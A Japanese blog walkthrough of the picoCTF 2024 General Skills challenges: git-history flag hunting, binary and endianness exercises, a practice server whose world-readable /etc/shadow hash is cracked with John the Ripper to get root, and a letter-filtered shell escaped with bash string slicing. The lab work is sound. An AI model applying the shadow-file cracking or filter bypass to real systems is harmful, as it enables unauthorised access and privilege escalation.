前回 は、picoCTF の picoCTF 2024 のうち、Reverse Engineering をやってみました。全7問のうち、Windowsプログラム の 3問は後回しにしました。

今回は、引き続き、picoCTF の picoCTF 2024 のうち、General Skills というカテゴリの全10問をやっていきたいと思います。Medium が 2問です。

それでは、やっていきます。

• はじめに
• picoCTF 2024：General Skills
  • Super SSH（25ポイント）
  • Commitment Issues（50ポイント）
  • Time Machine（50ポイント）
  • Blame Game（75ポイント）
  • Collaborative Development（75ポイント）
  • binhexa（100ポイント）
  • Binary Search（100ポイント）
  • endianness（200ポイント）
  • dont-you-love-banners（300ポイント）
  • SansAlpha（400ポイント）
• おわりに

はじめに

「セキュリティ」の記事一覧です。良かったら参考にしてください。

picoCTF の公式サイトは以下です。英語のサイトですが、シンプルで分かりやすいので困らずに進めることができます。

picoctf.com

それでは、やっていきます。

picoCTF 2024：General Skills

ポイントの低い順にやっていきます。

Super SSH（25ポイント）

Easy の問題です。サーバ（インスタンス）を起動するところから始まるようです。

早速、SSH で接続してみます。あ、接続しただけでフラグが取れました。チュートリアル的な感じですかね。

$ ssh ctf-player@titan.picoctf.net -p 54075
The authenticity of host '[titan.picoctf.net]:54075 ([3.139.174.234]:54075)' can't be established.
ED25519 key fingerprint is SHA256:4S9EbTSSRZm32I+cdM5TyzthpQryv5kudRP9PIKT7XQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[titan.picoctf.net]:54075' (ED25519) to the list of known hosts.
ctf-player@titan.picoctf.net's password:
Welcome ctf-player, here's your flag: picoCTF{s3cur3_c0nn3ct10n_45a48857}
Connection to titan.picoctf.net closed.

Commitment Issues（50ポイント）

Easy の問題です。バイナリファイル（challenge.zip）が 1つダウンロードできます。

解凍してみると、テキストファイル（message.txt）と、.git ディレクトリが入っていました。

ひとまず、git で接続してみます。2回のコミットがありますね、diff を見ます。フラグがありました。

$ git log
commit e1237df82d2e69f62dd53279abc1c8aeb66f6d64 (HEAD -> master)
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:10:14 2024 +0000

    remove sensitive info

commit 3d5ec8a26ee7b092a1760fea18f384c35e435139
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:10:14 2024 +0000

    create flag

$ git diff 3d5ec8a26ee7b092a1760fea18f384c35e435139..e1237df82d2e69f62dd53279abc1c8aeb66f6d64diff --git a/message.txt b/message.txt
index 96f7309..d552d1e 100644
--- a/message.txt
+++ b/message.txt
@@ -1 +1 @@
-picoCTF{s@n1t1z3_30e86d36}
+TOP SECRET

Time Machine（50ポイント）

Easy の問題です。バイナリファイル（challenge.zip）が 1つダウンロードできます。

解凍してみると、同じく、テキストファイル（message.txt）と、.git ディレクトリが入っていました。

では、git で接続してみます。1回のコミットがあり、コミットメッセージに、フラグが書かれています。さすがに簡単すぎるので、diff も見ておきます。何もなかったです。

$ git log
commit 3339c144a0c78dc2fbd3403d2fb37d3830be5d94 (HEAD -> master)
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:10:22 2024 +0000

    picoCTF{t1m3m@ch1n3_d3161c0f}

$ git show
commit 3339c144a0c78dc2fbd3403d2fb37d3830be5d94 (HEAD -> master)
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:10:22 2024 +0000

    picoCTF{t1m3m@ch1n3_d3161c0f}

diff --git a/message.txt b/message.txt
new file mode 100644
index 0000000..4324621
--- /dev/null
+++ b/message.txt
@@ -0,0 +1 @@
+This is what I was working on, but I'd need to look at my commit history to know why...
\ No newline at end of file

Blame Game（75ポイント）

Easy の問題です。バイナリファイル（challenge.zip）が 1つダウンロードできます。

解凍してみると、同じく、テキストファイル（message.txt）と、.git ディレクトリが入っていました。

では、git で接続してみます。今度はたくさんのコミットがあります。

各コミットのファイル差分を表示します。うーん、差分にフラグは含まれてないようです。とよく見たら、フラグが表示されてました。

$ git log --stat --oneline --graph --decorate --all
* ee09a4c (HEAD -> master) important business work
* 7d196f4 important business work
* 4d6ef56 important business work
* f901ef0 important business work
（中略）
* 5241c8d important business work
* fadeca9 optimize file size of prod code
|  message.py | 2 +-
|  1 file changed, 1 insertion(+), 1 deletion(-)
* 2dd4676 create top secret project
   message.py | 1 +
   1 file changed, 1 insertion(+)

$ git show fadeca9
commit fadeca9476b6713ec8cdda633aca9e9aebffc698
Author: picoCTF{@sk_th3_1nt3rn_e9957ce1} <ops@picoctf.com>
Date:   Sat Mar 9 21:09:11 2024 +0000

    optimize file size of prod code

diff --git a/message.py b/message.py
index 7df869a..326544a 100644
--- a/message.py
+++ b/message.py
@@ -1 +1 @@
-print("Hello, World!")
+print("Hello, World!"

$ git show 2dd4676
commit 2dd46769e2d65656bb14aed0ff5d3237daaa7d9d
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:09:11 2024 +0000

    create top secret project

diff --git a/message.py b/message.py
new file mode 100644
index 0000000..7df869a
--- /dev/null
+++ b/message.py
@@ -0,0 +1 @@
+print("Hello, World!")

Blame Game（責任転嫁）という意味らしく、gitコマンドにも blame というのがありました。それを使うと一瞬でした。

$ git blame message.py
fadeca94 (picoCTF{@sk_th3_1nt3rn_e9957ce1} 2024-03-09 21:09:11 +0000 1) print("Hello, World!"

Collaborative Development（75ポイント）

Easy の問題です。バイナリファイル（challenge.zip）が 1つダウンロードできます。

解凍してみると、今度は、Pythonスクリプト？（flag.py）と、.git ディレクトリが入っていました。

Pythonスクリプトに意味はなさそうです。

$ cat flag.py
print("Printing the flag...")

$ git log
commit 54c7842e34d03976ddc080a9dd76742751024358 (HEAD -> main)
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:09:44 2024 +0000

    init flag printer

$ git show 54c7842e34d03976ddc080a9dd76742751024358
commit 54c7842e34d03976ddc080a9dd76742751024358 (HEAD -> main)
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:09:44 2024 +0000

    init flag printer

diff --git a/flag.py b/flag.py
new file mode 100644
index 0000000..77d6cec
--- /dev/null
+++ b/flag.py
@@ -0,0 +1 @@
+print("Printing the flag...")

.git のディレクトリ含めて、全検索してみます。うーん、それらしいものは無さそうです。

$ find . -type f -print | xargs grep pico
./.git/logs/HEAD:0000000000000000000000000000000000000000 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018584 +0000   commit (initial): init flag printer
./.git/logs/HEAD:54c7842e34d03976ddc080a9dd76742751024358 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018584 +0000   checkout: moving from main to feature/part-1
./.git/logs/HEAD:54c7842e34d03976ddc080a9dd76742751024358 f65544e4f1511fe1d1dfff03c4d65869da039b8e picoCTF <ops@picoctf.com> 1710018585 +0000   commit: add part 1
./.git/logs/HEAD:f65544e4f1511fe1d1dfff03c4d65869da039b8e 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018585 +0000   checkout: moving from feature/part-1 to main
./.git/logs/HEAD:54c7842e34d03976ddc080a9dd76742751024358 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018585 +0000   checkout: moving from main to feature/part-2
./.git/logs/HEAD:54c7842e34d03976ddc080a9dd76742751024358 d3563a2c62ab2c95c5c13f3377cc6d79b2411c22 picoCTF <ops@picoctf.com> 1710018585 +0000   commit: add part 2
./.git/logs/HEAD:d3563a2c62ab2c95c5c13f3377cc6d79b2411c22 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018585 +0000   checkout: moving from feature/part-2 to main
./.git/logs/HEAD:54c7842e34d03976ddc080a9dd76742751024358 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018585 +0000   checkout: moving from main to feature/part-3
./.git/logs/HEAD:54c7842e34d03976ddc080a9dd76742751024358 5c00b43f48516d7cc81ea1f497b4d43ae6a84c4c picoCTF <ops@picoctf.com> 1710018585 +0000   commit: add part 3
./.git/logs/HEAD:5c00b43f48516d7cc81ea1f497b4d43ae6a84c4c 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018585 +0000   checkout: moving from feature/part-3 to main
./.git/logs/refs/heads/main:0000000000000000000000000000000000000000 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018584 +0000        commit (initial): init flag printer
./.git/logs/refs/heads/feature/part-1:0000000000000000000000000000000000000000 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018584 +0000      branch: Created from HEAD
./.git/logs/refs/heads/feature/part-1:54c7842e34d03976ddc080a9dd76742751024358 f65544e4f1511fe1d1dfff03c4d65869da039b8e picoCTF <ops@picoctf.com> 1710018585 +0000      commit: add part 1
./.git/logs/refs/heads/feature/part-2:0000000000000000000000000000000000000000 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018585 +0000      branch: Created from HEAD
./.git/logs/refs/heads/feature/part-2:54c7842e34d03976ddc080a9dd76742751024358 d3563a2c62ab2c95c5c13f3377cc6d79b2411c22 picoCTF <ops@picoctf.com> 1710018585 +0000      commit: add part 2
./.git/logs/refs/heads/feature/part-3:0000000000000000000000000000000000000000 54c7842e34d03976ddc080a9dd76742751024358 picoCTF <ops@picoctf.com> 1710018585 +0000      branch: Created from HEAD
./.git/logs/refs/heads/feature/part-3:54c7842e34d03976ddc080a9dd76742751024358 5c00b43f48516d7cc81ea1f497b4d43ae6a84c4c picoCTF <ops@picoctf.com> 1710018585 +0000      commit: add part 3

git の機能で見ていきます。あ、ブランチがありそうです。

feature/part-1 と feature/part-2 と eature/part-3 をつなぎ合わせると、picoCTF{t3@mw0rk_m@k3s_th3_dr3@m_w0rk_7ffa0077} です。

$ git tag

$ git branch
  feature/part-1
  feature/part-2
  feature/part-3
* main

$ git tree
* f65544e (feature/part-1) add part 1
|  flag.py | 1 +
|  1 file changed, 1 insertion(+)
| * d3563a2 (feature/part-2) add part 2
|/
|    flag.py | 2 ++
|    1 file changed, 2 insertions(+)
| * 5c00b43 (feature/part-3) add part 3
|/
|    flag.py | 2 ++
|    1 file changed, 2 insertions(+)
* 54c7842 (HEAD -> main) init flag printer
   flag.py | 1 +
   1 file changed, 1 insertion(+)

$ git checkout feature/part-1
Switched to branch 'feature/part-1'

$ cat flag.py
print("Printing the flag...")
print("picoCTF{t3@mw0rk_", end='')

$ git checkout feature/part-2
Switched to branch 'feature/part-2'

$ cat flag.py
print("Printing the flag...")

print("m@k3s_th3_dr3@m_", end='')

$ git checkout feature/part-3
Switched to branch 'feature/part-3'

$ cat flag.py
print("Printing the flag...")

print("w0rk_7ffa0077}")

binhexa（100ポイント）

Easy の問題です。サーバ（インスタンス）を起動するところから始まるようです。

とにかく接続してみます。順番に回答すれば良さそうです。Python を使えば楽勝です。

$ nc titan.picoctf.net 51548

Welcome to the Binary Challenge!"
Your task is to perform the unique operations in the given order and find the final result in hexadecimal that yields the f

Binary Number 1: 10011011
Binary Number 2: 10100000

Question 1/6:
Operation 1: '*'
Perform the operation on Binary Number 1&2.
Enter the binary result: 0b110000011100000

Correct!

Question 2/6:
Operation 2: '>>'
Perform a right shift of Binary Number 2 by 1 bits .
Enter the binary result: 0b1010000

Correct!

Question 3/6:
Operation 3: '+'
Perform the operation on Binary Number 1&2.
Enter the binary result: 0b100111011

Correct!

Question 4/6:
Operation 4: '<<'
Perform a left shift of Binary Number 1 by 1 bits.
Enter the binary result: 0b100110110
Correct!

Question 5/6:
Operation 5: '&'
Perform the operation on Binary Number 1&2.
Enter the binary result: 0b10000000

Correct!

Question 6/6:
Operation 6: '|'
Perform the operation on Binary Number 1&2.
Enter the binary result: 0b10111011

Correct!

Enter the results of the last operation in hexadecimal: 0xbb

Correct answer!
The flag is: picoCTF{b1tw^3se_0p3eR@tI0n_su33essFuL_6ab1ad84}

Python側も貼っておきます。もしかして、自分で計算しないとダメな問題でしたでしょうか（笑）。

>>> bin(0b10011011 * 0b10100000)
'0b110000011100000'
>>> bin(0b10100000>>1)
'0b1010000'
>>> bin(0b10011011 + 0b10100000)
'0b100111011'
>>> bin(0b10011011<<1)
'0b100110110'
>>> bin(0b10011011 & 0b10100000)
'0b10000000'
>>> bin(0b10011011 | 0b10100000)
'0b10111011'
>>> hex(0b10111011)
'0xbb'

Binary Search（100ポイント）

Easy の問題です。バイナリファイル（challenge.zip）が 1つダウンロードできます。

解凍してみると、シェルスクリプトが入ってました。なるほど、1 から 1000 までの数字がランダムで選ばれて、それを二分探索で答えていくということでしょうか。

#!/bin/bash

# Generate a random number between 1 and 1000
target=$(( (RANDOM % 1000) + 1 ))

echo "Welcome to the Binary Search Game!"
echo "I'm thinking of a number between 1 and 1000."

# Trap signals to prevent exiting
trap 'echo "Exiting is not allowed."' INT
trap '' SIGQUIT
trap '' SIGTSTP

# Limit the player to 10 guesses
MAX_GUESSES=10
guess_count=0

while (( guess_count < MAX_GUESSES )); do
    read -p "Enter your guess: " guess

    if ! [[ "$guess" =~ ^[0-9]+$ ]]; then
        echo "Please enter a valid number."
        continue
    fi

    (( guess_count++ ))

    if (( guess < target )); then
        echo "Higher! Try again."
    elif (( guess > target )); then
        echo "Lower! Try again."
    else
        echo "Congratulations! You guessed the correct number: $target"

        # Retrieve the flag from the metadata file
        flag=$(cat /challenge/metadata.json | jq -r '.flag')
        echo "Here's your flag: $flag"
        exit 0  # Exit with success code
    fi
done

# Player has exceeded maximum guesses
echo "Sorry, you've exceeded the maximum number of guesses."
exit 1  # Exit with error code to close the connection

早速やってみます。ギリギリいけました。そういうものなんですかね？

$ ssh -p 55589 ctf-player@atlas.picoctf.net
ctf-player@atlas.picoctf.net's password:
Welcome to the Binary Search Game!
I'm thinking of a number between 1 and 1000.
Enter your guess: 500
Higher! Try again.
Enter your guess: 750
Lower! Try again.
Enter your guess: 625
Higher! Try again.
Enter your guess: 687
Higher! Try again.
Enter your guess: 718
Lower! Try again.
Enter your guess: 702
Lower! Try again.
Enter your guess: 694
Lower! Try again.
Enter your guess: 690
Higher! Try again.
Enter your guess: 692
Lower! Try again.
Enter your guess: 691
Congratulations! You guessed the correct number: 691
Here's your flag: picoCTF{g00d_gu355_bee04a2a}
Connection to atlas.picoctf.net closed.

endianness（200ポイント）

Easy の問題です。C言語のソースコード（flag.c）が 1つダウンロードできます。

まずは、ビルドして実行してみます。なるほど、要領は分かりました。

$ gcc -o flag.out flag.c

$ ./flag.out
Welcome to the Endian CTF!
You need to find both the little endian and big endian representations of a word.
If you get both correct, you will receive the flag.
Word: syamq
Enter the Little Endian representation: 716D617973
Correct Little Endian representation!
Enter the Big Endian representation: 7379616D71
Correct Big Endian representation!
Flag not found. Please run this on the server

Python の方も貼っておきます。

>>> ''.join([f"{ord(a):X}" for a in "qmays"])
'716D617973'
>>> ''.join([f"{ord(a):X}" for a in "syamq"])
'7379616D71'

サーバの方も同じようにすると、フラグが取れました。

dont-you-love-banners（300ポイント）

Medium の問題です。サーバ（インスタンス）を起動するところから始まるようです。

まずは、接続してみます。なるほど、侵入系ですかね。

$ nc tethys.picoctf.net 55028
*************************************
**************WELCOME****************
*************************************

what is the password?
AAAAAAAA
Lol, good try, try again and good luck

もう一つ接続が提示されています。よく分かりませんが、パスワードっぽいです。

$ nc tethys.picoctf.net 49159
SSH-2.0-OpenSSH_7.6p1 My_Passw@rd_@1234
select * from user
Protocol mismatch.

もう一度接続します。質問の回答は Web で検索するとすぐに答えが分かります。あ、シェルが取れました。いろいろ探してみると、/root に flag.txt がありますが、読み取り権限がありません。/root/script.py を開くと、今回接続したプログラムのようです。

passwd と shadowファイルの権限がおかしいです。root は、SHA512 のハッシュを使ってるようです。

$ nc tethys.picoctf.net 55028
*************************************
**************WELCOME****************
*************************************

what is the password?
My_Passw@rd_@1234
What is the top cyber security conference in the world?
DefCon
the first hacker ever was known for phreaking(making free phone calls), who was it?
John Draper

player@challenge:~$ player@challenge:~$ ls -alF
ls -alF
total 20
drwxr-xr-x 1 player player   20 Mar  9  2024 ./
drwxr-xr-x 1 root   root     20 Mar  9  2024 ../
-rw-r--r-- 1 player player  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 player player 3771 Apr  4  2018 .bashrc
-rw-r--r-- 1 player player  807 Apr  4  2018 .profile
-rw-r--r-- 1 player player  114 Feb  7  2024 banner
-rw-r--r-- 1 root   root     13 Feb  7  2024 text

player@challenge:~$ ls -alF /root
ls -alF /root
total 16
drwxr-xr-x 1 root root    6 Mar 12  2024 ./
drwxr-xr-x 1 root root   29 Oct 12 12:05 ../
-rw-r--r-- 1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rwx------ 1 root root   46 Mar 12  2024 flag.txt*
-rw-r--r-- 1 root root 1317 Feb  7  2024 script.py

player@challenge:~$ cat /root/flag.txt
cat /root/flag.txt
cat: /root/flag.txt: Permission denied

player@challenge:~$ cat /root/script.py
cat /root/script.py

import os
import pty

incorrect_ans_reply = "Lol, good try, try again and good luck\n"

if __name__ == "__main__":
    try:
      with open("/home/player/banner", "r") as f:
        print(f.read())
    except:
      print("*********************************************")
      print("***************DEFAULT BANNER****************")
      print("*Please supply banner in /home/player/banner*")
      print("*********************************************")

try:
    request = input("what is the password? \n").upper()
    while request:
        if request == 'MY_PASSW@RD_@1234':
            text = input("What is the top cyber security conference in the world?\n").upper()
            if text == 'DEFCON' or text == 'DEF CON':
                output = input(
                    "the first hacker ever was known for phreaking(making free phone calls), who was it?\n").upper()
                if output == 'JOHN DRAPER' or output == 'JOHN THOMAS DRAPER' or output == 'JOHN' or output== 'DRAPER':
                    scmd = 'su - player'
                    pty.spawn(scmd.split(' '))

                else:
                    print(incorrect_ans_reply)
            else:
                print(incorrect_ans_reply)
        else:
            print(incorrect_ans_reply)
            break

except:
    KeyboardInterrupt

player@challenge:~$ cat banner
cat banner
*************************************
**************WELCOME****************
*************************************

player@challenge:~$ cat text
cat text
keep digging

player@challenge:~$ ls -alF /etc/passwd
ls -alF /etc/passwd
-rw-r--r-- 1 root root 1246 Mar  9  2024 /etc/passwd
player@challenge:~$ ls -alF /etc/shadow
ls -alF /etc/shadow
-rw-r--r-- 1 root shadow 855 Mar  9  2024 /etc/shadow

player@challenge:~$ cat /etc/shadow
cat /etc/shadow
root:$6$6QFbdp2H$R0BGBJtG0DlGFx9H0AjuQNOhlcssBxApM.CjDEiNzfYkVeJRNy2d98SDURNebD5/l4Hu2yyVk.ePLNEg/56DV0:19791:0:99999:7:::
daemon:*:19507:0:99999:7:::
bin:*:19507:0:99999:7:::
sys:*:19507:0:99999:7:::
sync:*:19507:0:99999:7:::
games:*:19507:0:99999:7:::
man:*:19507:0:99999:7:::
lp:*:19507:0:99999:7:::
mail:*:19507:0:99999:7:::
news:*:19507:0:99999:7:::
uucp:*:19507:0:99999:7:::
proxy:*:19507:0:99999:7:::
www-data:*:19507:0:99999:7:::
backup:*:19507:0:99999:7:::
list:*:19507:0:99999:7:::
irc:*:19507:0:99999:7:::
gnats:*:19507:0:99999:7:::
nobody:*:19507:0:99999:7:::
_apt:*:19507:0:99999:7:::
systemd-network:*:19791:0:99999:7:::
systemd-resolve:*:19791:0:99999:7:::
messagebus:*:19791:0:99999:7:::
sshd:*:19791:0:99999:7:::
player:$6$BCCW51fi$UI/5W01uG2.6EmxktMtZXbJQwrgDlv213cLwu7RxaIQHnRZXwKZ3yjuyNKf86KlSwbvAOp3YozpNVrBeKW9Ls0:19791:0:99999:7:::

John the Ripper でやってみます。あ、解けました。

$ john ./shadow --format=crypt
Created directory: /home/user/.john
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 6 for all loaded hashes
Cost 2 (algorithm specific iterations) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
iloveyou         (root)
1g 0:00:00:02 DONE 2/3 (2024-10-12 21:55) 0.4566g/s 1437p/s 1437c/s 1437C/s 123456..pepper
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

では、root にログインしてみます。フラグが取れました。

$ nc tethys.picoctf.net 60737
*************************************
**************WELCOME****************
*************************************

what is the password?
My_Passw@rd_@1234
What is the top cyber security conference in the world?
DefCon
the first hacker ever was known for phreaking(making free phone calls), who was it?
John Draper
player@challenge:~$ su root
su root
Password: iloveyou

root@challenge:/home/player# cat /root/flag.txt
cat /root/flag.txt
picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_a0e119d4}

SansAlpha（400ポイント）

Medium の問題です。サーバ（インスタンス）を起動するところから始まるようです。

では、接続します。うーん、何かおかしいです。問題文にあるように、数字と記号しか使えないんでしょうか。

$ ssh -p 49491 ctf-player@mimas.picoctf.net
The authenticity of host '[mimas.picoctf.net]:49491 ([52.15.88.75]:49491)' can't be established.
ED25519 key fingerprint is SHA256:n/hDgUtuTTF85Id7k2fxmHvb6rrLrACHNM6xLZ46AqQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[mimas.picoctf.net]:49491' (ED25519) to the list of known hosts.
ctf-player@mimas.picoctf.net's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 6.5.0-1016-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

SansAlpha$ hostname
SansAlpha: Unknown character detected
SansAlpha$ id
SansAlpha: Unknown character detected

数字と記号だけで何かできるでしょうか。ヒストリを実行するぐらいでしょうか。うーん、ダメっぽい。

SansAlpha$ !1
bash: !1: event not found

SansAlpha$ !2
bash: !2: event not found

SansAlpha$ !3
bash: !3: event not found

SansAlpha$ !4
bash: !4: event not found

SansAlpha$ !5
bash: !5: event not found

SansAlpha$ !6
bash: !6: event not found

SansAlpha$ !7
bash: !7: event not found

SansAlpha$ !0
bash: !0: event not found

適当に打ってたら、何か出ました。Ctrl+D を押したら何か出ました。Pythonスクリプトが動いてるようです。

SansAlpha$ !
>
SansAlpha$ "
>
SansAlpha$ #
>
SansAlpha$ $
>
SansAlpha$ %
>
SansAlpha$ &
>
SansAlpha$ '
bash: $'\n\n"""\n"\n:\n.\n1+2\n1+2=\n1+2=3\n11111111111111111111111111111111111111111111111\n!!:s^\n-\n00\n|~=\n|\n~\n!!:s^=\n=\n!\n"\n#\n$\n%\n&\n': command not found

SansAlpha$
Traceback (most recent call last):
  File "/usr/local/sansalpha.py", line 12, in <module>
    if user_in[-1] != "\n":
IndexError: string index out of range
Connection to mimas.picoctf.net closed.

検索すると、記号と数字だけでいろいろ出来るらしいです。

SansAlpha$ .
bash: .: filename argument required
.: usage: . filename [arguments]

SansAlpha$ __=$(__=“$(+ 2>&1)”;__=${__:13:3};${__} 2>&1);___=“$(/# 2>&1)”;____=${__:1:1}${___:22:1}${__:10:1}${__:10:1}           __=$(__=“$(+ 2>&1)”;__=${__:13:3};${__} 2>&1);___=“$(/# 2>&1)”;____=${__:1:1}${___:22:1}${__:10:1}${__:10:1}$          __=$(__=“$(+ 2>&1)”;__=${__:13:3};${__} 2>&1);___=“$(/# 2>&1)”;____=${__:1:1}${___:22:1}${__:10:1}${__:10:1}${         __=$(__=“$(+ 2>&1)”;__=${__:13:3};${__} 2>&1);___=“$(/# 2>&1)”;____=${__:1:1}${___:22:1}${__:10:1}${__:10:1}${_        __=$(__=“$(+ 2>&1)”;__=${__:13:3};${__} 2>&1);___=“$(/# 2>&1)”;____=${__:1:1}${___:22:1}${__:10:1}${__:10:1}${__:18:2}${__:0:1}${___:24:2}${__:10:1}${__:17:1};____=“${____^}”;___=${___:30:2}${___:4:1}${___:12:1};${___} ${____}
“HemmenTorme”

なるほど、分かってきました。以下は、+ を実行したときのメッセージ（bash: +: command not found）を、変数 __ に保存して、そのメッセージのうち、12番目から3文字（man）を切り出して、最後に実行しています。しかし、システムは最小化されてて manコマンドは無かったようです。unminimizeコマンドを実行できれば、いろいろ出来るようになりそうです。

SansAlpha$ +
bash: +: command not found

SansAlpha$ __="$(+ 2>&1)";__=${__:12:3};${__}
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, including manpages, you can run the 'unminimize'
command. You will still need to ensure the 'man-db' package is installed.

文字列 unminimize を構成する文字を上と同じ感じで作っていきます。un は、bash: +: command not found の最後の方にあるので、それだけ切り出して実行します。un だけ切り出せていることが確認できます。

SansAlpha$ __="$(- 2>&1)";__=${__:23:2};${__}
bash: un: command not found

同じ要領で、上の manコマンドを実行した場合のメッセージを使って、minimize を切り出します。

SansAlpha$ ___=$(___="$(- 2>&1)";___=${___:12:3};${___} 2>&1);____=${___:21:8};${____}
bash: minimize: command not found

これらを連結すると、unminimize が出来ます。うーん、出来ましたが、y で答えるところも作る必要がありそうです。

SansAlpha$ __="$(- 2>&1)";__=${__:23:2};___=$(___="$(- 2>&1)";___=${___:12:3};${___} 2>&1);___=${___:21:8};${__}${___}
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

This script restores content and packages that are found on a default
Ubuntu server system in order to make this system more suitable for
interactive use.

Reinstallation of packages may fail due to changes to the system
configuration, the presence of third-party packages, or for other
reasons.

This operation may take some time.

Would you like to continue? [y/N]
SansAlpha$ ls
SansAlpha: Unknown character detected

yes | unminimize を作りました。なんかエラーが出てるようです。さらに、unminimize に sudo が必要なようです。

SansAlpha$ __="$(- 2>&1)";_______=${__:23:2};________=${__:5:2};___=$(___="$(- 2>&1)";___=${___:12:3};${___} 2>&1);____=${___:21:8};_____=${___:6:1};__=${___:9:1};___=${___:3:1};${_____}${__}${___} | ${_______}${____}
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

This script restores content and packages that are found on a default
Ubuntu server system in order to make this system more suitable for
interactive use.

Reinstallation of packages may fail due to changes to the system
configuration, the presence of third-party packages, or for other
reasons.

This operation may take some time.

Re-enabling installation of all documentation in dpkg...
mv: cannot move '/etc/dpkg/dpkg.cfg.d/excludes' to '/etc/dpkg/dpkg.cfg.d/excludes.dpkg-tmp': Permission denied

sudo も追加してみました。sudo は使えないようです。

SansAlpha$ __="$(- 2>&1)";___=$(___="$(- 2>&1)";___=${___:12:3};${___} 2>&1);____=${___:21:8};_____=${___:6:1};_______=${__:23:2};________=${___:9:1};______=${___:3:1};_________=${__:23:1};__________=${__:25:1};___________=${__:22:1};${______}${_________}${__________}${___________} ${_____}${________}${______} | ${_______}${____}
bash: sudo: command not found
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

This script restores content and packages that are found on a default
Ubuntu server system in order to make this system more suitable for
interactive use.

Reinstallation of packages may fail due to changes to the system
configuration, the presence of third-party packages, or for other
reasons.

This operation may take some time.

unminimizeコマンドを使うという考えが間違っていたかもしれません。この手法で、フラグを読みに行くのかもしれません。とりあえず、lsコマンドを実行してみます。

SansAlpha$ __="$(/# 2>&1)";__=${__:20:1};___=$(___="$(- 2>&1)";___=${___:12:3};${___} 2>&1);______=${___:3:1};${__}${______}
blargh    on-calastran.txt

次は、catコマンドを実行してみます。テキストファイルの方は読めましたが、もう一つはディレクトリだったようです。

SansAlpha$ __="$(/# 2>&1)";___=${__:15:1};____=${__:1:1};_____=${__:31:1};${___}${____}${_____} ./*
cat: ./blargh: Is a directory
The Calastran multiverse is a complex and interconnected web of realities, each
with its own distinct characteristics and rules. At its core is the Nexus, a
cosmic hub that serves as the anchor point for countless universes and
dimensions. These realities are organized into Layers, with each Layer
representing a unique level of existence, ranging from the fundamental building
blocks of reality to the most intricate and fantastical realms. Travel between
Layers is facilitated by Quantum Bridges, mysterious conduits that allow
individuals to navigate the multiverse. Notably, the Calastran multiverse
exhibits a dynamic nature, with the Fabric of Reality continuously shifting and
evolving. Within this vast tapestry, there exist Nexus Nodes, focal points of
immense energy that hold sway over the destinies of entire universes. The
enigmatic Watchers, ancient beings attuned to the ebb and flow of the
multiverse, observe and influence key events. While the structure of Calastran
embraces diversity, it also poses challenges, as the delicate balance between
the Layers requires vigilance to prevent catastrophic breaches and maintain the
cosmic harmony.

そのディレクトリ以下を cat してみます。フラグありました！

SansAlpha$ __="$(/# 2>&1)";___=${__:15:1};____=${__:1:1};_____=${__:31:1};__="$(. ./* 2>&1)";______=${__:11:6};${___}${____}${_____} ${______}/*
return 0 picoCTF{7h15_mu171v3r53_15_m4dn355_8b3d83ad}Alpha-9, a distinctive layer within the Calastran multiverse, stands as a
sanctuary realm offering individuals a rare opportunity for rebirth and
introspection. Positioned as a serene refuge between the higher and lower
Layers, Alpha-9 serves as a cosmic haven where beings can start anew,
unburdened by the complexities of their past lives. The realm is characterized
by ethereal landscapes and soothing energies that facilitate healing and
self-discovery. Quantum Resonance Wells, unique to Alpha-9, act as conduits for
individuals to reflect on their past experiences from a safe and contemplative
distance. Here, time flows differently, providing a respite for those seeking
solace and renewal. Residents of Alpha-9 find themselves surrounded by an
atmosphere of rejuvenation, encouraging personal growth and the exploration of
untapped potential. While the layer offers a haven for introspection, it is not
without its challenges, as individuals must confront their past and navigate
the delicate equilibrium between redemption and self-acceptance within this
tranquil cosmic retreat.

General Skillsの全10問完了です！

おわりに

